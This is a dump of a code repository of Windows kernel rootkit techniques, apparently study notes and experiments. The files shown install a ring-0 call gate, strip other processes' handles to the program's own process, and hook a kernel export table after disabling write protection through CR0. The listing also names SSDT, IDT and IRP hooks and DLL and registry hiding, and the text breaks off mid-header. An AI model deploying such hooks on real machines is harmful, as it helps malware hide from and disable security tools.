├── CALLGATE ├── main.c ├── makefile └── sources ├── ChangeModulePath.cpp ├── CloseMyHandle ├── CloseMyHandle.suo └── main.c ├── EAT Hook ├── main.c ├── main.h ├── makefile └── sources ├── GetNtoskrnlexe ├── ByZwQuerySystemInformation.c ├── FindDirect.c ├── makefile └── sources ├── HideDll ├── HideDllInMMVAD.c ├── main.c ├── makefile └── sources ├── HideReg.c ├── HookNtCreateSectionProtectProcess.c ├── HookZwQueryDirectoryFile ├── main.c ├── makefile ├── objfre_wxp_x86 │ └── i386 │ │ └── main.obj.oacr.root.x86fre.pft.xml └── sources ├── IDTCALL ├── main.c ├── makefile └── sources ├── IDTHook ├── IDTHook.c ├── makefile └── sources ├── IOMAP ├── IOMAP.suo ├── MAKEFILE ├── SOURCES └── main.c ├── IOMAP2 ├── main.c ├── makefile └── sources ├── IRPHook ├── main.c ├── makefile └── sources ├── Inline Hook ├── main.c ├── makefile └── sources ├── InlineHookObReferenced ├── main.c ├── makefile └── sources ├── KernelAndUserHook ├── main.c ├── makefile ├── pe.h └── sources ├── KillThread ├── LDasm.c ├── LDasm.h ├── main.c ├── makefile └── sources ├── PAGE_GURAD保护数据 ├── PEB.suo └── main.cpp ├── RPC ├── APCExec.c ├── Process.c ├── Process.h ├── makefile └── sources ├── Ring0ChangePEB ├── main.c ├── makefile └── sources ├── SSDTHook ├── SSDTHook.c ├── SSDTHook.h ├── makefile └── sources ├── SYSENTERHook ├── main.c ├── makefile └── sources ├── comfilter ├── main.c ├── makefile └── sources ├── 内核函数.txt ├── 分段机制.txt ├── 分页管理.txt ├── 天书夜读.txt └── 数据库专业课.txt /CALLGATE/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "stdio.h" 3 | 4 | 5 | #define GDT_LIMIT 0x3ff 6 | #define GATE_TYPE 0xEC 7 | 8 | typedef unsigned int DWORD; 9 | typedef unsigned char BYTE; 10 | typedef unsigned short WORD; 11 | 12 | char outString[] = "abcdefg"; 13 | 14 | int now; 15 | typedef struct _CALLGATE { 16 | WORD offsetl; 17 | WORD selector; 18 | BYTE count; 19 | BYTE type; 20 | WORD offseth; 21 | } CALLGATE, *PCALLGATE; 22 | 23 | 24 | __declspec(naked) void MyCALLGATE() 25 | { 26 | __asm { 27 | cli; 28 | pushad; 29 | pushfd; 30 | mov eax, offset outString 31 | push eax 32 | mov eax, 80528e92h; 33 | call eax; 34 | pop eax 35 | popfd; 36 | popad; 37 | sti; 38 | retf; 39 | } 40 | } 41 | 42 | NTSTATUS AddCallGate(DWORD MyCALLGATE) 43 | { 44 | char s[256]; 45 | char gdt[6]; 46 | DWORD base; 47 | PCALLGATE pCallGate = NULL; 48 | 49 | now = 8; 50 | 51 | _asm sgdt gdt; 52 | base = *(DWORD*)(gdt + 2); 53 | 54 | while (now < GDT_LIMIT) 55 | { 56 | pCallGate = (PCALLGATE)(base + now); 57 | if ((pCallGate->type & 0x80) == 0) 58 | { 59 | _snprintf(s, 256, "%08x\n", now|3); 60 | DbgPrint(s); 61 | pCallGate->type = GATE_TYPE; 62 | pCallGate->offsetl = (WORD)((DWORD)MyCALLGATE & 0xFFFF); 63 | pCallGate->selector = 0x08; 64 | pCallGate->offseth = (WORD)((DWORD)MyCALLGATE >> 16); 65 | pCallGate->count = 0; 66 | DbgPrint("Add call gate!\n"); 67 | break; 68 | } 69 | now += 8; 70 | } 71 | 72 | return STATUS_SUCCESS; 73 | } 74 | 75 | void Unload(PDRIVER_OBJECT driver) 76 | { 77 | char gdt[6]; 78 | DWORD base; 79 | PCALLGATE pCallGate = NULL; 80 | 81 | _asm sgdt gdt; 82 | 83 | base = *(DWORD*)(gdt + 2); 84 | pCallGate = (PCALLGATE)(base + now); 85 | pCallGate->type = 0; 86 | DbgPrint("Unload!\n"); 87 | } 88 | 89 | NTSTATUS DriverEntry(IN PDRIVER_OBJECT driver, IN PUNICODE_STRING szReg) 90 | { 91 | AddCallGate((DWORD)MyCALLGATE); 92 | driver->DriverUnload = Unload; 93 | return STATUS_SUCCESS; 94 | } -------------------------------------------------------------------------------- /CALLGATE/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /CALLGATE/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=CALLGATE 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /ChangeModulePath.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/ChangeModulePath.cpp -------------------------------------------------------------------------------- /CloseMyHandle/CloseMyHandle.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/CloseMyHandle/CloseMyHandle.suo -------------------------------------------------------------------------------- /CloseMyHandle/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | typedef LONG NTSTATUS; 7 | typedef ULONG ACCESS_MASK; 8 | 9 | #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 10 | #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L) 11 | #define NT_SUCCESS(status) ((NTSTATUS)status >= 0) 12 | 13 | 14 | #define InitializeObjectAttributes( p, n, a, r, s) \ 15 | { \ 16 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 17 | (p)->RootDirectory = r; (p)->Attributes = a;\ 18 | (p)->ObjectName = n; \ 19 | (p)->SecurityDescriptor = s; \ 20 | (p)->SecurityQualityOfService = NULL; \ 21 | } 22 | 23 | typedef enum _SYSTEM_INFORMATION_CLASS 24 | { 25 | SystemBasicInformation, // 00 Y N 26 | SystemProcessorInformation, // 01 Y N 27 | SystemPerformanceInformation, // 02 Y N 28 | SystemTimeOfDayInformation, // 03 Y N 29 | SystemNotImplemented1, // 04 Y N 30 | SystemProcessesAndThreadsInformation, // 05 Y N 31 | SystemCallCounts, // 06 Y N 32 | SystemConfigurationInformation, // 07 Y N 33 | SystemProcessorTimes, // 08 Y N 34 | SystemGlobalFlag, // 09 Y Y 35 | SystemNotImplemented2, // 10 Y N 36 | SystemModuleInformation, // 11 Y N 37 | SystemLockInformation, // 12 Y N 38 | SystemNotImplemented3, // 13 Y N 39 | SystemNotImplemented4, // 14 Y N 40 | SystemNotImplemented5, // 15 Y N 41 | SystemHandleInformation, // 16 Y N 42 | SystemObjectInformation, // 17 Y N 43 | SystemPagefileInformation, // 18 Y N 44 | SystemInstructionEmulationCounts, // 19 Y N 45 | SystemInvalidInfoClass1, // 20 46 | SystemCacheInformation, // 21 Y Y 47 | SystemPoolTagInformation, // 22 Y N 48 | SystemProcessorStatistics, // 23 Y N 49 | SystemDpcInformation, // 24 Y Y 50 | SystemNotImplemented6, // 25 Y N 51 | SystemLoadImage, // 26 N Y 52 | SystemUnloadImage, // 27 N Y 53 | SystemTimeAdjustment, // 28 Y Y 54 | SystemNotImplemented7, // 29 Y N 55 | SystemNotImplemented8, // 30 Y N 56 | SystemNotImplemented9, // 31 Y N 57 | SystemCrashDumpInformation, // 32 Y N 58 | SystemExceptionInformation, // 33 Y N 59 | SystemCrashDumpStateInformation, // 34 Y Y/N 60 | SystemKernelDebuggerInformation, // 35 Y N 61 | SystemContextSwitchInformation, // 36 Y N 62 | SystemRegistryQuotaInformation, // 37 Y Y 63 | SystemLoadAndCallImage, // 38 N Y 64 | SystemPrioritySeparation, // 39 N Y 65 | SystemNotImplemented10, // 40 Y N 66 | SystemNotImplemented11, // 41 Y N 67 | SystemInvalidInfoClass2, // 42 68 | SystemInvalidInfoClass3, // 43 69 | SystemTimeZoneInformation, // 44 Y N 70 | SystemLookasideInformation, // 45 Y N 71 | SystemSetTimeSlipEvent, // 46 N Y 72 | SystemCreateSession, // 47 N Y 73 | SystemDeleteSession, // 48 N Y 74 | SystemInvalidInfoClass4, // 49 75 | SystemRangeStartInformation, // 50 Y N 76 | SystemVerifierInformation, // 51 Y Y 77 | SystemAddVerifier, // 52 N Y 78 | SystemSessionProcessesInformation // 53 Y N 79 | } SYSTEM_INFORMATION_CLASS; 80 | 81 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { 82 | USHORT UniqueProcessId; 83 | USHORT CreatorBackTraceIndex; 84 | UCHAR ObjectTypeIndex; 85 | UCHAR HandleAttributes; 86 | USHORT HandleValue; 87 | PVOID Object; 88 | ULONG GrantedAccess; 89 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; 90 | 91 | typedef struct _UNICODE_STRING { 92 | USHORT Length; 93 | USHORT MaximumLength; 94 | PWSTR Buffer; 95 | } UNICODE_STRING,*PUNICODE_STRING; 96 | 97 | typedef struct _OBJECT_ATTRIBUTES { 98 | ULONG Length; 99 | HANDLE RootDirectory; 100 | PUNICODE_STRING ObjectName; 101 | ULONG Attributes; 102 | PVOID SecurityDescriptor; 103 | PVOID SecurityQualityOfService; 104 | } OBJECT_ATTRIBUTES,*POBJECT_ATTRIBUTES; 105 | 106 | typedef struct _CLIENT_ID { 107 | HANDLE UniqueProcess; 108 | HANDLE UniqueThread; 109 | } CLIENT_ID,*PCLIENT_ID; 110 | 111 | typedef enum _SYSTEM_HANDLE_TYPE 112 | { 113 | OB_TYPE_UNKNOWN, //0 114 | OB_TYPE_TYPE, //1 115 | OB_TYPE_DIRECTORY, //2 116 | OB_TYPE_SYMBOLIC_LINK,//3 117 | OB_TYPE_TOKEN, //4 118 | OB_TYPE_PROCESS, //5 119 | OB_TYPE_THREAD, //6 120 | OB_TYPE_UNKNOWN_7, //7 121 | OB_TYPE_EVENT, //8 122 | OB_TYPE_EVENT_PAIR, //9 123 | OB_TYPE_MUTANT, //10 124 | OB_TYPE_UNKNOWN_11, //11 125 | OB_TYPE_SEMAPHORE, //12 126 | OB_TYPE_TIMER, //13 127 | OB_TYPE_PROFILE, //14 128 | OB_TYPE_WINDOW_STATION,//15 129 | OB_TYPE_DESKTOP, //16 130 | OB_TYPE_SECTION, //17 131 | OB_TYPE_KEY, //18 132 | OB_TYPE_PORT, //19 133 | OB_TYPE_WAITABLE_PORT,//20 134 | OB_TYPE_UNKNOWN_21, 135 | OB_TYPE_UNKNOWN_22, 136 | OB_TYPE_UNKNOWN_23, 137 | OB_TYPE_UNKNOWN_24, 138 | OB_TYPE_IO_COMPLETION,//25 139 | OB_TYPE_FILE //26 140 | } SYSTEM_HANDLE_TYPE; 141 | 142 | typedef NTSTATUS 143 | (__stdcall *ZWQUERYSYSTEMINFORMATION ) ( 144 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 145 | PVOID SystemInformation, 146 | ULONG SystemInformationLength, 147 | PULONG ReturnLength OPTIONAL 148 | ); 149 | 150 | 151 | typedef NTSTATUS 152 | (__stdcall *ZWOPENPROCESS) ( 153 | PHANDLE ProcessHandle, 154 | ULONG DesiredAccess, 155 | POBJECT_ATTRIBUTES ObjectAttributes, 156 | PCLIENT_ID ClientId 157 | ); 158 | 159 | typedef NTSTATUS 160 | (__stdcall *ZWALLOCATEVIRTUALMEMORY) ( 161 | HANDLE ProcessHandle, 162 | PVOID *BaseAddress, 163 | ULONG ZeroBits, 164 | PSIZE_T RegionSize, 165 | ULONG AllocationType, 166 | ULONG Protect 167 | ); 168 | 169 | 170 | typedef NTSTATUS 171 | (__stdcall *ZWFREEVIRTUALMEMORY)( 172 | HANDLE ProcessHandle, 173 | PVOID *BaseAddress, 174 | PSIZE_T RegionSize, 175 | ULONG FreeType 176 | ); 177 | 178 | typedef NTSTATUS 179 | (__stdcall *ZWOPENTHREAD)( 180 | PHANDLE ThreadHandle, 181 | ACCESS_MASK DesiredAccess, 182 | POBJECT_ATTRIBUTES ObjectAttributes, 183 | PCLIENT_ID ClientId 184 | ); 185 | 186 | typedef NTSTATUS 187 | (__stdcall *ZWDUPLICATEOBJECT)( 188 | HANDLE SourceProcessHandle, 189 | HANDLE SourceHandle, 190 | HANDLE TargetProcessHandle, 191 | PHANDLE TargetHandle, 192 | ACCESS_MASK DesiredAccess, 193 | ULONG HandleAttributes, 194 | ULONG Options 195 | ); 196 | 197 | typedef NTSTATUS 198 | (__stdcall *ZWCLOSE)( 199 | HANDLE Handle 200 | ); 201 | 202 | typedef DWORD 203 | (__stdcall *RTLNTSTATUSTODOSERROR)( 204 | NTSTATUS status 205 | ); 206 | 207 | ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation; 208 | ZWOPENPROCESS ZwOpenProcess; 209 | ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory; 210 | ZWFREEVIRTUALMEMORY ZwFreeVirtualMemory; 211 | ZWOPENTHREAD ZwOpenThread; 212 | ZWDUPLICATEOBJECT ZwDuplicateObject; 213 | ZWCLOSE ZwClose; 214 | RTLNTSTATUSTODOSERROR RtlNtStatusToDosError; 215 | 216 | PSYSTEM_HANDLE_TABLE_ENTRY_INFO pHandleInfo; 217 | 218 | DWORD pGetProcessId(void); 219 | DWORD pGetThreadId(void); 220 | 221 | void PrintZwError(char* message, NTSTATUS status) 222 | { 223 | char *errMsg; 224 | FormatMessage( 225 | FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM, 226 | NULL, 227 | RtlNtStatusToDosError(status),MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), 228 | (LPTSTR)&errMsg, 229 | 0, 230 | NULL); 231 | printf("%s: %s Error code=0x%08x\n", message, errMsg, status); 232 | LocalFree(errMsg); 233 | } 234 | 235 | void CloseMyHandle() 236 | { 237 | HANDLE hCurProcess, hSrcProcessHandle, hDstHandle; 238 | HANDLE hMyProcess = INVALID_HANDLE_VALUE, hMyThread = INVALID_HANDLE_VALUE; 239 | DWORD nBufferLen = 0x40000, nRetLen = 0; 240 | DWORD HandleCount, NumberOfHandles; 241 | DWORD pMyProcessObject = 0, pMyThreadObject = 0, pObject; 242 | CLIENT_ID myCid, tmpCid; 243 | PVOID pBuffer = NULL; 244 | NTSTATUS status; 245 | OBJECT_ATTRIBUTES ObjectAttributes; 246 | 247 | myCid.UniqueProcess = (HANDLE)pGetProcessId(); 248 | myCid.UniqueThread = (HANDLE)pGetThreadId(); 249 | InitializeObjectAttributes( 250 | &ObjectAttributes, 251 | NULL, 252 | 0, 253 | NULL, 254 | NULL); 255 | status = ZwOpenProcess( 256 | &hMyProcess, 257 | PROCESS_ALL_ACCESS, 258 | &ObjectAttributes, 259 | &myCid ); 260 | status= ZwOpenThread( 261 | &hMyThread, 262 | THREAD_ALL_ACCESS, 263 | &ObjectAttributes, 264 | &myCid); 265 | printf("Process: %0x, Thread: %08x\n", 266 | hMyProcess, 267 | hMyThread); 268 | 269 | hCurProcess = GetCurrentProcess(); 270 | status = ZwAllocateVirtualMemory( 271 | hCurProcess, 272 | &pBuffer, 273 | 0, 274 | &nBufferLen, 275 | MEM_COMMIT, 276 | PAGE_READWRITE); 277 | if (!NT_SUCCESS(status)) 278 | { 279 | printf("Allocate memory failed!\n"); 280 | return; 281 | } 282 | printf("Allocate memory: %08x\n", pBuffer); 283 | 284 | status = ZwQuerySystemInformation( 285 | SystemHandleInformation, 286 | pBuffer, 287 | nBufferLen, 288 | &nRetLen); 289 | printf("Searching handles......\n"); 290 | HandleCount = *(DWORD*)pBuffer; 291 | printf("Handle count: %d\n", HandleCount); 292 | printf("Memory need: 0x%08x\n", 293 | HandleCount * sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO)+4); 294 | 295 | if (HandleCount > 1) 296 | { 297 | NumberOfHandles = *(DWORD*)pBuffer; 298 | pHandleInfo = (PSYSTEM_HANDLE_TABLE_ENTRY_INFO) 299 | ((char*)pBuffer + sizeof(DWORD)); 300 | do 301 | { 302 | if ( pHandleInfo->HandleValue == (USHORT)hMyThread) 303 | { 304 | if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess) 305 | { 306 | pMyThreadObject = *(DWORD*)&(pHandleInfo->Object); 307 | printf("Thread found!\n"); 308 | } 309 | } 310 | if ( pHandleInfo->HandleValue == (USHORT)hMyProcess) 311 | { 312 | if (pHandleInfo->UniqueProcessId == (USHORT)myCid.UniqueProcess) 313 | { 314 | pMyProcessObject = *(DWORD*)&(pHandleInfo->Object); 315 | printf("Process found!\n"); 316 | } 317 | } 318 | ++pHandleInfo; 319 | --NumberOfHandles; 320 | } while (NumberOfHandles); 321 | } 322 | 323 | ZwClose(hMyProcess); 324 | ZwClose(hMyThread); 325 | printf("Start close......\n"); 326 | 327 | if (HandleCount >=1 ) 328 | { 329 | pHandleInfo = (PSYSTEM_HANDLE_TABLE_ENTRY_INFO) 330 | ((char*)pBuffer + sizeof(DWORD)); 331 | do 332 | { 333 | pObject = *(DWORD*)&(pHandleInfo->Object); 334 | 335 | if (pObject == pMyProcessObject || pObject == pMyThreadObject) 336 | { 337 | printf("Found handle=0x%08x OwnerPID = %4d\n", 338 | pHandleInfo->HandleValue, 339 | pHandleInfo->UniqueProcessId); 340 | tmpCid.UniqueProcess = (HANDLE)pHandleInfo->UniqueProcessId; 341 | tmpCid.UniqueThread = 0; 342 | InitializeObjectAttributes(&ObjectAttributes, 343 | NULL, 344 | 0, 345 | NULL, 346 | NULL); 347 | status = ZwOpenProcess( 348 | &hSrcProcessHandle, 349 | PROCESS_DUP_HANDLE, 350 | &ObjectAttributes, 351 | &tmpCid ); 352 | if (!status) 353 | { 354 | status = ZwDuplicateObject( 355 | hSrcProcessHandle, 356 | (void*)pHandleInfo->HandleValue, 357 | hCurProcess, 358 | &hDstHandle, 359 | 0, 360 | 0, 361 | DUPLICATE_CLOSE_SOURCE); 362 | if (!status) 363 | { 364 | ZwClose(hDstHandle); 365 | printf("close handle\n"); 366 | } 367 | ZwClose(hSrcProcessHandle); 368 | } 369 | } 370 | ++pHandleInfo; 371 | --HandleCount; 372 | } while (HandleCount); 373 | } 374 | ZwFreeVirtualMemory( 375 | hCurProcess, 376 | &pBuffer, 377 | &nBufferLen, 378 | MEM_RELEASE); 379 | } 380 | 381 | void EnableDebugPriv() 382 | { 383 | HANDLE hToken; 384 | LUID uid; 385 | TOKEN_PRIVILEGES tkp; 386 | OpenProcessToken( 387 | GetCurrentProcess(), 388 | TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, 389 | &hToken); 390 | LookupPrivilegeValue(NULL, 391 | SE_DEBUG_NAME, 392 | &uid); 393 | tkp.PrivilegeCount = 1; 394 | tkp.Privileges[0].Luid = uid; 395 | tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 396 | AdjustTokenPrivileges(hToken,FALSE, &tkp, 397 | sizeof(tkp), NULL, NULL); 398 | CloseHandle(hToken); 399 | } 400 | 401 | DWORD __declspec(naked) pGetProcessId() 402 | { 403 | __asm 404 | { 405 | mov eax, fs:[0x18]; 406 | mov eax,[eax + 0x20]; 407 | retn; 408 | } 409 | } 410 | 411 | DWORD __declspec(naked) pGetThreadId() 412 | { 413 | __asm 414 | { 415 | mov eax, fs:[0x18]; 416 | mov eax, [eax+0x20]; 417 | retn; 418 | } 419 | } 420 | 421 | int main() 422 | { 423 | HANDLE h; 424 | HMODULE hDll = LoadLibrary(L"ntdll.dll"); 425 | ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hDll,"ZwQuerySystemInformation"); 426 | ZwOpenProcess = (ZWOPENPROCESS)GetProcAddress(hDll,"ZwOpenProcess"); 427 | ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hDll,"ZwAllocateVirtualMemory"); 428 | ZwFreeVirtualMemory = (ZWFREEVIRTUALMEMORY)GetProcAddress(hDll,"ZwFreeVirtualMemory"); 429 | ZwOpenThread = (ZWOPENTHREAD)GetProcAddress(hDll,"ZwOpenThread"); 430 | ZwDuplicateObject = (ZWDUPLICATEOBJECT)GetProcAddress(hDll,"ZwDuplicateObject"); 431 | ZwClose = (ZWCLOSE)GetProcAddress(hDll,"ZwClose"); 432 | RtlNtStatusToDosError = (RTLNTSTATUSTODOSERROR)GetProcAddress(hDll,"RtlNtStatusToDosError"); 433 | 434 | EnableDebugPriv(); 435 | h = OpenProcess( 436 | PROCESS_QUERY_INFORMATION, 437 | 0, 438 | GetProcessId(NULL)); 439 | printf("Handle := %08x\n", h); 440 | CloseMyHandle(); 441 | FreeLibrary(hDll); 442 | printf("End.\n"); 443 | return 0; 444 | } -------------------------------------------------------------------------------- /EAT Hook/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "main.h" 3 | #pragma comment(lib, "ntdll.lib") 4 | 5 | #define FUNCNAME "PsGetCurrentProcessId" 6 | DWORD old, count = 0; 7 | typedef HANDLE (*FUNCTION)(); 8 | 9 | HANDLE NewFunction() 10 | { 11 | count++; 12 | return ((FUNCTION)old)(); 13 | } 14 | 15 | DWORD GetModuleBaseAddress(PBYTE ModuleName) 16 | { 17 | NTSTATUS status; 18 | DWORD size = 0, index; 19 | PDWORD buffer; 20 | PSYSTEM_MODULE_INFORMATION module; 21 | DWORD ModuleAddress = 0; 22 | 23 | ZwQuerySystemInformation( 24 | SystemModuleInformation, 25 | NULL, 26 | &size, 27 | &size); 28 | if (size == 0) 29 | { 30 | DbgPrint("SystemModuleInformation length cannot be defined!\n"); 31 | return 0; 32 | } 33 | buffer = ExAllocatePool(NonPagedPool, size); 34 | if (!buffer) 35 | { 36 | DbgPrint("ExAllocatePool error!\n"); 37 | return 0; 38 | } 39 | status = ZwQuerySystemInformation( 40 | SystemModuleInformation, 41 | buffer, 42 | size, 43 | 0); 44 | if (status != STATUS_SUCCESS) 45 | { 46 | DbgPrint("Query Information error!\n"); 47 | return 0; 48 | } 49 | module = (PSYSTEM_MODULE_INFORMATION)((PDWORD)buffer + 1); 50 | for (index = 0; index < *buffer; index++) 51 | { 52 | if (_stricmp(module[index].ImageName + module[index].ModuleNameOffset, 53 | ModuleName) == 0) 54 | { 55 | ModuleAddress = (DWORD)module[index].Base; 56 | DbgPrint("Module found at: %08x\n", ModuleAddress); 57 | } 58 | } 59 | ExFreePool(buffer); 60 | return ModuleAddress; 61 | } 62 | 63 | VOID Hook(BOOLEAN hook) 64 | { 65 | DWORD base, index, addr = 0, i; 66 | PIMAGE_DOS_HEADER pDosHeader; 67 | PIMAGE_NT_HEADERS pNtHeader; 68 | PIMAGE_EXPORT_DIRECTORY exports; 69 | 70 | PBYTE pFuncName = NULL; 71 | PDWORD pAddressOfFunction, pAddressOfNames; 72 | PWORD pAddressOfNameOdrinals; 73 | 74 | base = GetModuleBaseAddress("ntkrnlpa.exe"); 75 | DbgPrint("base: %08x\n", base); 76 | 77 | pDosHeader = (PIMAGE_DOS_HEADER)base; 78 | pNtHeader = (PIMAGE_NT_HEADERS)(base + pDosHeader->e_lfanew); 79 | exports = (PIMAGE_EXPORT_DIRECTORY)(base + 80 | pNtHeader->OptionalHeader.DataDirectory[0].VirtualAddress); 81 | 82 | pAddressOfFunction = (PDWORD)(base + exports->AddressOfFunctions); 83 | pAddressOfNames = (PDWORD)(base + exports->AddressOfNames); 84 | pAddressOfNameOdrinals = (PWORD)(base + exports->AddressOfNameOrdinals); 85 | 86 | for (i = 0; iNumberOfNames; i++) 87 | { 88 | index = pAddressOfFunction[i]; 89 | pFuncName = (PBYTE)(base + pAddressOfNames[i]); 90 | if (_stricmp(pFuncName, FUNCNAME) == 0) 91 | { 92 | addr = base + (DWORD)pAddressOfFunction[index]; 93 | break; 94 | } 95 | } 96 | 97 | if (addr == 0) 98 | { 99 | DbgPrint("addr is 0\n"); 100 | return; 101 | } 102 | 103 | if (hook) 104 | { 105 | _asm 106 | { 107 | cli; 108 | mov eax, cr0; 109 | and eax, not 10000h; 110 | mov cr0, eax; 111 | sti; 112 | } 113 | DbgPrint("PsGetCurrentProcessId : %08x\n", addr); 114 | pAddressOfFunction[index] = (DWORD)NewFunction - base; 115 | old = addr; 116 | _asm 117 | { 118 | cli; 119 | mov eax, cr0; 120 | or eax, 10000h; 121 | mov cr0, eax; 122 | sti; 123 | } 124 | } else 125 | { 126 | _asm 127 | { 128 | cli; 129 | mov eax, cr0; 130 | and eax, not 10000h; 131 | mov cr0, eax; 132 | sti; 133 | } 134 | pAddressOfFunction[index] = (DWORD)old - base; 135 | _asm 136 | { 137 | cli; 138 | mov eax, cr0; 139 | or eax, 10000h; 140 | mov cr0, eax; 141 | sti; 142 | } 143 | } 144 | } 145 | 146 | VOID Unload(PDRIVER_OBJECT driver) 147 | { 148 | Hook(0); 149 | DbgPrint("Unload!\n"); 150 | DbgPrint("PsGetCurrentProcessId called %d times\n", count); 151 | } 152 | 153 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 154 | { 155 | Hook(0); 156 | DbgPrint("DriverEntry!\n"); 157 | driver->DriverUnload = Unload; 158 | return STATUS_SUCCESS; 159 | } 160 | -------------------------------------------------------------------------------- /EAT Hook/main.h: -------------------------------------------------------------------------------- 1 | #ifndef _MAIN_H 2 | #define _MAIN_H 3 | 4 | typedef unsigned short WORD; 5 | typedef unsigned char BYTE; 6 | typedef unsigned long DWORD; 7 | typedef WORD* PWORD; 8 | typedef DWORD* PDWORD; 9 | typedef BYTE* PBYTE; 10 | 11 | 12 | typedef enum _SYSTEM_INFORMATION_CLASS { 13 | SystemBasicInformation, // 0 Y N 14 | SystemProcessorInformation, // 1 Y N 15 | SystemPerformanceInformation, // 2 Y N 16 | SystemTimeOfDayInformation, // 3 Y N 17 | SystemNotImplemented1, // 4 Y N 18 | SystemProcessesAndThreadsInformation, // 5 Y N 19 | SystemCallCounts, // 6 Y N 20 | SystemConfigurationInformation, // 7 Y N 21 | SystemProcessorTimes, // 8 Y N 22 | SystemGlobalFlag, // 9 Y Y 23 | SystemNotImplemented2, // 10 Y N 24 | SystemModuleInformation, // 11 Y N 25 | SystemLockInformation, // 12 Y N 26 | SystemNotImplemented3, // 13 Y N 27 | SystemNotImplemented4, // 14 Y N 28 | SystemNotImplemented5, // 15 Y N 29 | SystemHandleInformation, // 16 Y N 30 | SystemObjectInformation, // 17 Y N 31 | SystemPagefileInformation, // 18 Y N 32 | SystemInstructionEmulationCounts, // 19 Y N 33 | SystemInvalidInfoClass1, // 20 34 | SystemCacheInformation, // 21 Y Y 35 | SystemPoolTagInformation, // 22 Y N 36 | SystemProcessorStatistics, // 23 Y N 37 | SystemDpcInformation, // 24 Y Y 38 | SystemNotImplemented6, // 25 Y N 39 | SystemLoadImage, // 26 N Y 40 | SystemUnloadImage, // 27 N Y 41 | SystemTimeAdjustment, // 28 Y Y 42 | SystemNotImplemented7, // 29 Y N 43 | SystemNotImplemented8, // 30 Y N 44 | SystemNotImplemented9, // 31 Y N 45 | SystemCrashDumpInformation, // 32 Y N 46 | SystemExceptionInformation, // 33 Y N 47 | SystemCrashDumpStateInformation, // 34 Y Y/N 48 | SystemKernelDebuggerInformation, // 35 Y N 49 | SystemContextSwitchInformation, // 36 Y N 50 | SystemRegistryQuotaInformation, // 37 Y Y 51 | SystemLoadAndCallImage, // 38 N Y 52 | SystemPrioritySeparation, // 39 N Y 53 | SystemNotImplemented10, // 40 Y N 54 | SystemNotImplemented11, // 41 Y N 55 | SystemInvalidInfoClass2, // 42 56 | SystemInvalidInfoClass3, // 43 57 | SystemTimeZoneInformation, // 44 Y N 58 | SystemLookasideInformation, // 45 Y N 59 | SystemSetTimeSlipEvent, // 46 N Y 60 | SystemCreateSession, // 47 N Y 61 | SystemDeleteSession, // 48 N Y 62 | SystemInvalidInfoClass4, // 49 63 | SystemRangeStartInformation, // 50 Y N 64 | SystemVerifierInformation, // 51 Y Y 65 | SystemAddVerifier, // 52 N Y 66 | SystemSessionProcessesInformation // 53 Y N 67 | } SYSTEM_INFORMATION_CLASS; 68 | 69 | NTSYSAPI 70 | NTSTATUS 71 | NTAPI 72 | ZwQuerySystemInformation( 73 | IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 74 | IN OUT PVOID SystemInformation, 75 | IN ULONG SystemInformationLength, 76 | OUT PULONG ReturnLength OPTIONAL 77 | ); 78 | 79 | typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11 80 | ULONG Reserved[2]; 81 | PVOID Base; 82 | ULONG Size; 83 | ULONG Flags; 84 | USHORT Index; 85 | USHORT Unknown; 86 | USHORT LoadCount; 87 | USHORT ModuleNameOffset; 88 | CHAR ImageName[256]; 89 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 90 | 91 | typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header 92 | WORD e_magic; // Magic number 93 | WORD e_cblp; // Bytes on last page of file 94 | WORD e_cp; // Pages in file 95 | WORD e_crlc; // Relocations 96 | WORD e_cparhdr; // Size of header in paragraphs 97 | WORD e_minalloc; // Minimum extra paragraphs needed 98 | WORD e_maxalloc; // Maximum extra paragraphs needed 99 | WORD e_ss; // Initial (relative) SS value 100 | WORD e_sp; // Initial SP value 101 | WORD e_csum; // Checksum 102 | WORD e_ip; // Initial IP value 103 | WORD e_cs; // Initial (relative) CS value 104 | WORD e_lfarlc; // File address of relocation table 105 | WORD e_ovno; // 